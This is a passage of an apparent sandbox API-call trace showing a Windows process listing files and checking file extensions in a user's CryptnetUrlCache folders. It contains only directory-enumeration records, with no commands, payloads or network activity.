ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0061.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0061.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0061.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0061.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0061.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0061.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0061.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0061.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0061.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0061.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0061.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0061.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbddd270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0xd2da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0061.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0061.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0061.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0061.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0061.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0061.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0061.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0061.241] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0061.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0061.241] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0061.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0061.241] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0061.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0061.241] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0061.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0061.241] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0061.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0061.241] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0061.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0061.241] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0061.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0061.241] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0061.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0061.241] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0061.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0061.242] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0061.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0061.242] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0061.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0061.242] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0061.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0061.242] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0061.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0061.242] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x64b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0061.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0061.242] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0061.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0061.242] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0061.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0061.242] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0061.242] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.242] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.243] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.243] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0061.243] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0061.243] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0061.243] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.243] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.243] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.243] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.243] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.243] PathFindFileNameW (pszPath="") returned="" [0061.243] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.243] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.243] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, 